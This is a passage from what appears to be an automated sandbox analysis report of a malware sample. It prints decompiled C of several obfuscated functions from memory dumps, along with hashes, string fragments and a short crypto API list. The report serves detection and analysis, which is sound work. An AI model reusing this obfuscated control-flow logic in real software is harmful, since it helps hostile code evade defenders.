                                                      								_t188 =  *0x24ca24; // 0x0
                                                      								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
                                                      								 *0x24ca24 = _t222;
                                                      								return _t188;
                                                      							}
                                                      							if(_t223 == 0x16c9d000) {
                                                      								E0024422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
                                                      								_t223 = 0xb1cacb5;
                                                      								goto L15;
                                                      							}
                                                      							if(_t223 == 0x2094e6da) {
                                                      								_push(_v24);
                                                      								_t190 = E00246DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
                                                      								_t228 =  &(_t228[5]);
                                                      								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
                                                      								__eflags = _t190;
                                                      								_t198 = 0x374e1c43;
                                                      								_t182 = 0x15aea868;
                                                      								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
                                                      								goto L12;
                                                      							}
                                                      							if(_t223 == _t218) {
                                                      								_push(_t198);
                                                      								_t191 = E00231132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00249586);
                                                      								_t228 =  &(_t228[9]);
                                                      								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
                                                      								__eflags = _t191;
                                                      								_t182 = 0x15aea868;
                                                      								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
                                                      								goto L11;
                                                      							}
                                                      							if(_t223 != _t198) {
                                                      								goto L19;
                                                      							}
                                                      							_t192 = E002376DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
                                                      							_t228 =  &(_t228[2]);
                                                      							 *((intOrPtr*)(_t222 + 4)) = _t192;
                                                      							_t218 = 0x28fd42b4;
                                                      							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
                                                      							goto L1;
                                                      							L19:
                                                      							__eflags = _t223 - 0x3a1f14a3;
                                                      						} while (__eflags != 0);
                                                      						return _t182;
                                                      					}
                                                      				}
                                                      			}
                                                      0x00236b61
                                                      0x00236b69
                                                      0x00236b71
                                                      0x00236b79
                                                      0x00236b81
                                                      0x00236b8b
                                                      0x00236b90
                                                      0x00236b95
                                                      0x00236b9d
                                                      0x00236ba5
                                                      0x00236bad
                                                      0x00236bb5
                                                      0x00236bbd
                                                      0x00236bc5
                                                      0x00236bd2
                                                      0x00236bd6
                                                      0x00236bde
                                                      0x00236be6
                                                      0x00236bee
                                                      0x00236bf6
                                                      0x00236bfe
                                                      0x00236c06
                                                      0x00236c0e
                                                      0x00236c16
                                                      0x00236c1e
                                                      0x00236c1e
                                                      0x00236c1e
                                                      0x00236c23
                                                      0x00000000
                                                      0x00236c28
                                                      0x00236c28
                                                      0x00236c2e
                                                      0x00236d35
                                                      0x00236d36
                                                      0x00236d39
                                                      0x00236d3f
                                                      0x00236d43
                                                      0x00236d45
                                                      0x00236d4e
                                                      0x00236d53
                                                      0x00236d58
                                                      0x00236d5d
                                                      0x00000000
                                                      0x00236d5d
                                                      0x00236d47
                                                      0x00236d22
                                                      0x00236d22
                                                      0x00236cca
                                                      0x00236cca
                                                      0x00236ccf
                                                      0x00236ccf
                                                      0x00000000
                                                      0x00236ccf
                                                      0x00236c3a
                                                      0x00000000
                                                      0x00236d96
                                                      0x00236c42
                                                      0x00236d70
                                                      0x00236d73
                                                      0x00236d78
                                                      0x00236d7b
                                                      0x00000000
                                                      0x00236d7b
                                                      0x00236c4e
                                                      0x00236d17
                                                      0x00236d1d
                                                      0x00000000
                                                      0x00236d1d
                                                      0x00236c5a
                                                      0x00236cd9
                                                      0x00236ceb
                                                      0x00236cf0
                                                      0x00236cf3
                                                      0x00236cf6
                                                      0x00236cfd
                                                      0x00236d02
                                                      0x00236d07
                                                      0x00000000
                                                      0x00236d07
                                                      0x00236c5e
                                                      0x00236c93
                                                      0x00236cb0
                                                      0x00236cb5
                                                      0x00236cb8
                                                      0x00236cbb
                                                      0x00236cc2
                                                      0x00236cc7
                                                      0x00000000
                                                      0x00236cc7
                                                      0x00236c62
                                                      0x00000000
                                                      0x00000000
                                                      0x00236c77
                                                      0x00236c7c
                                                      0x00236c7f
                                                      0x00236c89
                                                      0x00236c8e
                                                      0x00000000
                                                      0x00236d62
                                                      0x00236d62
                                                      0x00236d62
                                                      0x00000000
                                                      0x00236c28
                                                      0x00236c28

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "=$'&/U$.V$?j$GX$y7X$k<
                                                      • API String ID: 0-2482092835
                                                      • Opcode ID: ca5628ad3bb111046fd6c74fa9a90bf973a19b33518606bf6bcf2b320ef3f076
                                                      • Instruction ID: 432e12e82c7949babc6f175744fb818aabc46917c1141e8a05bf98bf4cf31fd7
                                                      • Opcode Fuzzy Hash: ca5628ad3bb111046fd6c74fa9a90bf973a19b33518606bf6bcf2b320ef3f076
                                                      • Instruction Fuzzy Hash: E8A174B2528341AFD358CF25C58A40BFBE1FBD4754F508A1DF48A96260D7B5C919CF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00231280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				signed int _v128;
                                                      				void* _t124;
                                                      				void* _t136;
                                                      				void* _t143;
                                                      				signed int _t144;
                                                      				signed int _t145;
                                                      				signed int _t146;
                                                      				void* _t149;
                                                      				void* _t170;
                                                      				void* _t172;
                                                      				void* _t173;
                                                      
                                                      				_push(_a16);
                                                      				_t169 = _a8;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t124);
                                                      				_v112 = 0x527a;
                                                      				_t173 = _t172 + 0x18;
                                                      				_v112 = _v112 + 0x9ab3;
                                                      				_t170 = 0;
                                                      				_t149 = 0x18640a1d;
                                                      				_t144 = 0x56;
                                                      				_v112 = _v112 * 0x2c;
                                                      				_v112 = _v112 ^ 0x0028d5a0;
                                                      				_v84 = 0xce56;
                                                      				_v84 = _v84 | 0x89224a79;
                                                      				_v84 = _v84 ^ 0x8922db02;
                                                      				_v124 = 0x8cd1;
                                                      				_v124 = _v124 ^ 0x879587c2;
                                                      				_v124 = _v124 | 0xdff4f7f6;
                                                      				_v124 = _v124 ^ 0xdff58592;
                                                      				_v80 = 0x5082;
                                                      				_v80 = _v80 * 5;
                                                      				_v80 = _v80 ^ 0x0001dd7a;
                                                      				_v100 = 0x94cc;
                                                      				_v100 = _v100 >> 1;
                                                      				_v100 = _v100 + 0xc5d3;
                                                      				_v100 = _v100 ^ 0x0001674a;
                                                      				_v104 = 0x7528;
                                                      				_v104 = _v104 | 0x4afc80c9;
                                                      				_v104 = _v104 * 0x41;
                                                      				_v104 = _v104 ^ 0x0a3a6635;
                                                      				_v108 = 0x5a30;
                                                      				_v108 = _v108 >> 6;
                                                      				_t145 = 0x51;
                                                      				_v108 = _v108 / _t144;
                                                      				_v108 = _v108 ^ 0x00000b43;
                                                      				_v128 = 0x7a75;
                                                      				_v128 = _v128 ^ 0x183e3e2b;
                                                      				_v128 = _v128 >> 0xe;
                                                      				_v128 = _v128 << 1;
                                                      				_v128 = _v128 ^ 0x0000b567;
                                                      				_v88 = 0xd0b6;
                                                      				_v88 = _v88 << 2;
                                                      				_v88 = _v88 ^ 0x0003606d;
                                                      				_v92 = 0x29e5;
                                                      				_v92 = _v92 << 0x10;
                                                      				_v92 = _v92 ^ 0x29e559c0;
                                                      				_v116 = 0xa20c;
                                                      				_v116 = _v116 / _t145;
                                                      				_v116 = _v116 << 1;
                                                      				_v116 = _v116 ^ 0x00003b63;
                                                      				_v120 = 0xbe93;
                                                      				_v120 = _v120 | 0x1a4ed6db;
                                                      				_v120 = _v120 + 0xa009;
                                                      				_v120 = _v120 + 0xfffff07c;
                                                      				_v120 = _v120 ^ 0x1a4feb5f;
                                                      				_v96 = 0x4975;
                                                      				_t146 = 0x2b;
                                                      				_v96 = _v96 * 0x31;
                                                      				_v96 = _v96 / _t146;
                                                      				_v96 = _v96 ^ 0x000025f7;
                                                      				do {
                                                      					while(_t149 != 0x1a9c3b7) {
                                                      						if(_t149 == 0xb87d72f) {
                                                      							__eflags = E0023B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
                                                      							_t170 =  !=  ? 1 : _t170;
                                                      						} else {
                                                      							if(_t149 == 0x18640a1d) {
                                                      								_t149 = 0x1a19e858;
                                                      								continue;
                                                      							} else {
                                                      								if(_t149 == 0x1a19e858) {
                                                      									E002450F2( &_v76, _v112, _v84, _v124, _a12);
                                                      									_t173 = _t173 + 0xc;
                                                      									_t149 = 0x1a9c3b7;
                                                      									continue;
                                                      								} else {
                                                      									if(_t149 != 0x2b3c78b1) {
                                                      										goto L13;
                                                      									} else {
                                                      										_t143 = E00248F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
                                                      										_t173 = _t173 + 0x10;
                                                      										if(_t143 != 0) {
                                                      											_t149 = 0xb87d72f;
                                                      											continue;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L16:
                                                      						return _t170;
                                                      					}
                                                      					_t136 = E00248F11( &_v76, _v80, _v100, _t169, _v104, _v108);
                                                      					_t173 = _t173 + 0x10;
                                                      					__eflags = _t136;
                                                      					if(__eflags == 0) {
                                                      						_t149 = 0x1a747795;
                                                      						goto L13;
                                                      					} else {
                                                      						_t149 = 0x2b3c78b1;
                                                      						continue;
                                                      					}
                                                      					goto L16;
                                                      					L13:
                                                      					__eflags = _t149 - 0x1a747795;
                                                      				} while (__eflags != 0);
                                                      				goto L16;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0Z$5f:$c;$uI$uz$zR
                                                      • API String ID: 0-4070947617
                                                      • Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                                      • Instruction ID: 14e3f2a68fbbba4ff3f09a31d1960bb7da5a8a6a525d4934ed443a0206307409
                                                      • Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                                      • Instruction Fuzzy Hash: AB6156B1119341AFD758CF20C98591FBBE1FBC9748F80991DF296861A0D7B9CA188F43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E002317AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
                                                      				char _v4;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				void* __ecx;
                                                      				void* _t124;
                                                      				intOrPtr _t144;
                                                      				void* _t148;
                                                      				signed int _t167;
                                                      				signed int _t168;
                                                      				signed int _t169;
                                                      				signed int _t170;
                                                      				void* _t172;
                                                      				signed int* _t175;
                                                      
                                                      				_push(_a20);
                                                      				_push(1);
                                                      				_push(1);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				E0023602B(_t124);
                                                      				_v48 = 0x839b;
                                                      				_t175 =  &(( &_v52)[7]);
                                                      				_t172 = 0;
                                                      				_t148 = 0xc9f1fee;
                                                      				_t167 = 0x65;
                                                      				_v48 = _v48 / _t167;
                                                      				_v48 = _v48 + 0xffff5433;
                                                      				_t168 = 0x4c;
                                                      				_v48 = _v48 / _t168;
                                                      				_v48 = _v48 ^ 0x035e614e;
                                                      				_v52 = 0x7a24;
                                                      				_t169 = 0x57;
                                                      				_v52 = _v52 * 0x3d;
                                                      				_v52 = _v52 / _t169;
                                                      				_v52 = _v52 | 0x143fc393;
                                                      				_v52 = _v52 ^ 0x143ff5ea;
                                                      				_v32 = 0x6195;
                                                      				_v32 = _v32 ^ 0x160f1dee;
                                                      				_v32 = _v32 << 1;
                                                      				_v32 = _v32 ^ 0x2c1ed936;
                                                      				_v44 = 0xc7f4;
                                                      				_v44 = _v44 + 0xffff31e5;
                                                      				_v44 = _v44 | 0xcdfc86d8;
                                                      				_v44 = _v44 + 0xffff4cbe;
                                                      				_v44 = _v44 ^ 0xffff1878;
                                                      				_v12 = 0x3e0d;
                                                      				_v12 = _v12 << 4;
                                                      				_v12 = _v12 ^ 0x0003ab13;
                                                      				_v24 = 0xe2a2;
                                                      				_t170 = 0x4a;
                                                      				_v24 = _v24 * 0x7d;
                                                      				_v24 = _v24 >> 4;
                                                      				_v24 = _v24 ^ 0x0006fa2b;
                                                      				_v16 = 0xd6eb;
                                                      				_v16 = _v16 >> 0xb;
                                                      				_v16 = _v16 ^ 0x0000394e;
                                                      				_v40 = 0x5ece;
                                                      				_v40 = _v40 * 0x43;
                                                      				_v40 = _v40 / _t170;
                                                      				_v40 = _v40 >> 0xe;
                                                      				_v40 = _v40 ^ 0x000003d1;
                                                      				_v28 = 0xdfec;
                                                      				_v28 = _v28 >> 6;
                                                      				_v28 = _v28 << 0xb;
                                                      				_v28 = _v28 ^ 0x001be0b4;
                                                      				_v20 = 0x73b;
                                                      				_v20 = _v20 ^ 0xd6615083;
                                                      				_v20 = _v20 ^ 0xd6610707;
                                                      				_v36 = 0x46b8;
                                                      				_v36 = _v36 | 0xf1966772;
                                                      				_v36 = _v36 ^ 0x374c3a36;
                                                      				_v36 = _v36 * 0x27;
                                                      				_v36 = _v36 ^ 0x4b440184;
                                                      				_v8 = 0xd697;
                                                      				_v8 = _v8 ^ 0x6f8084df;
                                                      				_v8 = _v8 ^ 0x6f807f26;
                                                      				_t171 = _v4;
                                                      				while(_t148 != 0x24e4c4b) {
                                                      					if(_t148 == 0xc9f1fee) {
                                                      						_t148 = 0x3ad8e818;
                                                      						continue;
                                                      					} else {
                                                      						if(_t148 == 0x1ffca7a2) {
                                                      							E00241AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
                                                      							_t175 =  &(_t175[0xa]);
                                                      							_t148 = 0x24e4c4b;
                                                      							_t172 =  !=  ? 1 : _t172;
                                                      							continue;
                                                      						} else {
                                                      							if(_t148 == 0x34494570) {
                                                      								if(E00240729(_v32,  &_v4, _v44, _t171) != 0) {
                                                      									_t148 = 0x1ffca7a2;
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								if(_t148 != 0x3ad8e818) {
                                                      									L13:
                                                      									if(_t148 != 0x2a0664e6) {
                                                      										continue;
                                                      									}
                                                      								} else {
                                                      									_t144 = E0023F6DF(_t148);
                                                      									_t171 = _t144;
                                                      									if(_t144 != 0xffffffff) {
                                                      										_t148 = 0x34494570;
                                                      										continue;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					return _t172;
                                                      				}
                                                      				E00244F7D(_v36, _v8, _v4);
                                                      				_t148 = 0x2a0664e6;
                                                      				goto L13;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: >$$z$6:L7$N9$pEI4$pEI4
                                                      • API String ID: 0-302225334
                                                      • Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                                      • Instruction ID: 264d070849df8c1b975648e5a33df35598f3db68e84b70a681082842ca8b208f
                                                      • Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                                      • Instruction Fuzzy Hash: 1C6163B11183419FD348CE65D88581FBBE5BFC8358F404A1EF196962A0C3B5CA6ACF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E002420C5() {
                                                      				char _v524;
                                                      				signed int _v528;
                                                      				signed int _v532;
                                                      				intOrPtr _v536;
                                                      				signed int _v540;
                                                      				signed int _v544;
                                                      				signed int _v548;
                                                      				signed int _v552;
                                                      				signed int _v556;
                                                      				signed int _v560;
                                                      				signed int _v564;
                                                      				signed int _v568;
                                                      				signed int _v572;
                                                      				signed int _v576;
                                                      				signed int _v580;
                                                      				signed int _v584;
                                                      				signed int _v588;
                                                      				signed int _v592;
                                                      				void* _t124;
                                                      				short* _t127;
                                                      				void* _t132;
                                                      				void* _t134;
                                                      				intOrPtr _t150;
                                                      				signed int _t159;
                                                      				signed int _t160;
                                                      				signed int _t161;
                                                      				signed int _t167;
                                                      				void* _t169;
                                                      
                                                      				_t169 = (_t167 & 0xfffffff8) - 0x250;
                                                      				_v532 = _v532 & 0x00000000;
                                                      				_v528 = _v528 & 0x00000000;
                                                      				_t132 = 0x3ec8c14;
                                                      				_v536 = 0x37230;
                                                      				_v544 = 0xcdd0;
                                                      				_v544 = _v544 >> 7;
                                                      				_v544 = _v544 ^ 0x000074a7;
                                                      				_v572 = 0xb951;
                                                      				_v572 = _v572 + 0xffffa9df;
                                                      				_v572 = _v572 ^ 0x00005eca;
                                                      				_v584 = 0x3783;
                                                      				_v584 = _v584 >> 1;
                                                      				_t159 = 0x30;
                                                      				_v584 = _v584 / _t159;
                                                      				_v584 = _v584 ^ 0x00007df0;
                                                      				_v592 = 0x764f;
                                                      				_t160 = 0x29;
                                                      				_v592 = _v592 * 0x6c;
                                                      				_v592 = _v592 + 0xffff1483;
                                                      				_v592 = _v592 ^ 0x0030effe;
                                                      				_v580 = 0x26e4;
                                                      				_v580 = _v580 + 0xffffa17d;
                                                      				_v580 = _v580 >> 0xc;
                                                      				_v580 = _v580 ^ 0x000fb6a3;
                                                      				_v588 = 0x592d;
                                                      				_v588 = _v588 * 0x5e;
                                                      				_v588 = _v588 + 0xfffff058;
                                                      				_v588 = _v588 ^ 0x0020c0b6;
                                                      				_v576 = 0x67c6;
                                                      				_v576 = _v576 >> 4;
                                                      				_v576 = _v576 | 0x70f0481f;
                                                      				_v576 = _v576 ^ 0x70f020ed;
                                                      				_v568 = 0x5c9a;
                                                      				_v568 = _v568 ^ 0x6d262440;
                                                      				_v568 = _v568 ^ 0x6d2624e4;
                                                      				_v552 = 0x512d;
                                                      				_v552 = _v552 / _t160;
                                                      				_v552 = _v552 ^ 0x00002fd7;
                                                      				_v540 = 0x67a3;
                                                      				_v540 = _v540 + 0x741c;
                                                      				_v540 = _v540 ^ 0x0000c39d;
                                                      				_v560 = 0xac4b;
                                                      				_v560 = _v560 | 0x611015d1;
                                                      				_v560 = _v560 ^ 0x6110f087;
                                                      				_v548 = 0xff97;
                                                      				_v548 = _v548 >> 8;
                                                      				_v548 = _v548 ^ 0x000016db;
                                                      				_v556 = 0xce04;
                                                      				_t161 = 0x2b;
                                                      				_v556 = _v556 / _t161;
                                                      				_v556 = _v556 ^ 0x000048b5;
                                                      				_v564 = 0x85d6;
                                                      				_v564 = _v564 >> 0xf;
                                                      				_v564 = _v564 ^ 0x00007642;
                                                      				do {
                                                      					while(_t132 != 0x3ec8c14) {
                                                      						if(_t132 == 0x4e3e716) {
                                                      							_push(_v572);
                                                      							_t124 = E0024889D(0x24c9b0, _v544, __eflags);
                                                      							_pop(_t134);
                                                      							_t150 =  *0x24ca2c; // 0x698300
                                                      							_t108 = _t150 + 0x230; // 0x7a0043
                                                      							E0023C680(_t108, _v592, _v580, _t134, _v588,  *0x24ca2c, _t124,  &_v524);
                                                      							_t169 = _t169 + 0x1c;
                                                      							_t127 = E00242025(_v576, _t124, _v568, _v552);
                                                      							_t132 = 0x36d909ae;
                                                      							continue;
                                                      						} else {
                                                      							if(_t132 == 0x2942dba3) {
                                                      								_t127 = E00242B16(_v548,  &_v524, E002484CC, _v564, 0,  &_v524);
                                                      							} else {
                                                      								if(_t132 != 0x36d909ae) {
                                                      									goto L8;
                                                      								} else {
                                                      									_t127 = E002328CE( &_v524, _v540, _v560);
                                                      									 *_t127 = 0;
                                                      									_t132 = 0x2942dba3;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						L11:
                                                      						return _t127;
                                                      					}
                                                      					_t132 = 0x4e3e716;
                                                      					L8:
                                                      					__eflags = _t132 - 0x16e8989b;
                                                      				} while (__eflags != 0);
                                                      				goto L11;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -Q$-Y$Bv$Ov$$&m$&
                                                      • API String ID: 0-2434786051
                                                      • Opcode ID: 190095b375f8a9e8f5931243a11a7ef555f847ccc54168a8f8c5417840ecaf4c
                                                      • Instruction ID: c6c1dbc34df42e263c4c7a55ed743f158a6199bc5e193a4933f0676fcd8ecc2c
                                                      • Opcode Fuzzy Hash: 190095b375f8a9e8f5931243a11a7ef555f847ccc54168a8f8c5417840ecaf4c
                                                      • Instruction Fuzzy Hash: 2E516771118341AFD368CF25C88A91BBBF1FBC4368F509A1DF585862A0C7B58959CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                                      • CoTaskMemAlloc.OLE32(?), ref: 10002227
                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                                      • StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                                      • CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
                                                      • String ID:
                                                      • API String ID: 2967290590-0
                                                      • Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                                      • Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
                                                      • Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                                      • Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E00236754(intOrPtr __ecx, intOrPtr* __edx) {
                                                      				char _v520;
                                                      				signed int _v524;
                                                      				intOrPtr _v528;
                                                      				intOrPtr _v532;
                                                      				unsigned int _v536;
                                                      				signed int _v540;
                                                      				signed int _v544;
                                                      				signed int _v548;
                                                      				signed int _v552;
                                                      				signed int _v556;
                                                      				signed int _v560;
                                                      				signed int _v564;
                                                      				signed int _v568;
                                                      				signed int _v572;
                                                      				void* _t96;
                                                      				signed int _t97;
                                                      				signed int _t101;
                                                      				intOrPtr _t104;
                                                      				signed int _t106;
                                                      				signed int _t107;
                                                      				void* _t108;
                                                      				signed int _t123;
                                                      				void* _t124;
                                                      				intOrPtr* _t128;
                                                      				signed int* _t129;
                                                      
                                                      				_t129 =  &_v572;
                                                      				_v524 = _v524 & 0x00000000;
                                                      				_v532 = 0x37527f;
                                                      				_v528 = 0x4295e6;
                                                      				_v536 = 0xee22;
                                                      				_v536 = _v536 >> 0xc;
                                                      				_v536 = _v536 ^ 0x00007a3a;
                                                      				_v544 = 0x8f72;
                                                      				_v544 = _v544 | 0xa1a2610a;
                                                      				_v544 = _v544 ^ 0xa1a2ad19;
                                                      				_v540 = 0xc65b;
                                                      				_v540 = _v540 << 9;
                                                      				_v540 = _v540 ^ 0x018ca8d5;
                                                      				_v572 = 0x4354;
                                                      				_v572 = _v572 << 0xd;
                                                      				_v572 = _v572 + 0xffff6940;
                                                      				_v572 = _v572 * 0x52;
                                                      				_t128 = __edx;
                                                      				_v572 = _v572 ^ 0xb1ecefd2;
                                                      				_v552 = 0x7a0c;
                                                      				_t104 = __ecx;
                                                      				_v552 = _v552 | 0xfffddbf7;
                                                      				_t124 = 0x1663684c;
                                                      				_v552 = _v552 ^ 0xfffd8a47;
                                                      				_v568 = 0x9348;
                                                      				_t106 = 0xf;
                                                      				_v568 = _v568 * 0x32;
                                                      				_v568 = _v568 + 0x92e3;
                                                      				_v568 = _v568 * 0x69;
                                                      				_v568 = _v568 ^ 0x0c08d7a0;
                                                      				_v556 = 0x9f50;
                                                      				_v556 = _v556 / _t106;
                                                      				_v556 = _v556 >> 2;
                                                      				_v556 = _v556 ^ 0x000022d0;
                                                      				_v548 = 0xa3e1;
                                                      				_v548 = _v548 >> 0xd;
                                                      				_v548 = _v548 ^ 0x000031bd;
                                                      				_v564 = 0x55b6;
                                                      				_v564 = _v564 >> 1;
                                                      				_v564 = _v564 + 0xaf4f;
                                                      				_t107 = 0x5e;
                                                      				_t123 = _v548;
                                                      				_v564 = _v564 / _t107;
                                                      				_v564 = _v564 ^ 0x0000417a;
                                                      				_v560 = 0xe775;
                                                      				_v560 = _v560 << 4;
                                                      				_v560 = _v560 << 0xd;
                                                      				_v560 = _v560 ^ 0xceea6264;
                                                      				do {
                                                      					while(_t124 != 0x32e36bf) {
                                                      						if(_t124 == 0xcc4ee6e) {
                                                      							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
                                                      							_t97 =  *0x24ca24; // 0x0
                                                      							 *(_t123 + 0x2c) = _t97;
                                                      							 *0x24ca24 = _t123;
                                                      							return _t97;
                                                      						}
                                                      						if(_t124 != 0x1663684c) {
                                                      							if(_t124 == 0x2308bbf2) {
                                                      								return E0023F536(_v548, _v564, _v560, _t123);
                                                      							}
                                                      							if(_t124 != 0x242d3c72) {
                                                      								goto L12;
                                                      							} else {
                                                      								_push( &_v520);
                                                      								_t101 = E002388E5(_t104, _t128);
                                                      								asm("sbb esi, esi");
                                                      								_t107 = 0x24c910;
                                                      								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
                                                      								continue;
                                                      							}
                                                      							L16:
                                                      							return _t101;
                                                      						}
                                                      						_push(_t107);
                                                      						_t108 = 0x38;
                                                      						_t101 = E00238736(_t108);
                                                      						_t123 = _t101;
                                                      						_t107 = _t107;
                                                      						if(_t123 != 0) {
                                                      							_t124 = 0x242d3c72;
                                                      							continue;
                                                      						}
                                                      						goto L16;
                                                      					}
                                                      					_push(_t107);
                                                      					_push(_v556);
                                                      					_push( &_v520);
                                                      					_push(_v568);
                                                      					_push(0);
                                                      					_push(_v552);
                                                      					_t107 = _v572;
                                                      					_push(0);
                                                      					_t96 = E0023568E(_t107, 0);
                                                      					_t129 =  &(_t129[7]);
                                                      					if(_t96 == 0) {
                                                      						_t124 = 0x2308bbf2;
                                                      						goto L12;
                                                      					} else {
                                                      						_t124 = 0xcc4ee6e;
                                                      						continue;
                                                      					}
                                                      					goto L16;
                                                      					L12:
                                                      				} while (_t124 != 0x2bbec955);
                                                      				return _t101;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :z$r<-$$r<-$$u$zA
                                                      • API String ID: 0-4189644680
                                                      • Opcode ID: 86d232f8efbc88837c505427109f0e3599ce15e139d8a6a1de7a3c3cf3c78fa0
                                                      • Instruction ID: f3af6f531a140bdd196b3ef3c74a434b9fb8403054edc712698feacff5f812af
                                                      • Opcode Fuzzy Hash: 86d232f8efbc88837c505427109f0e3599ce15e139d8a6a1de7a3c3cf3c78fa0
                                                      • Instruction Fuzzy Hash: 7A519BB1518302AFD318CF26C54961FBBE4EBC8758F10891DF4D8A62A0D7B4DA19CF82
                                                      Uniqueness

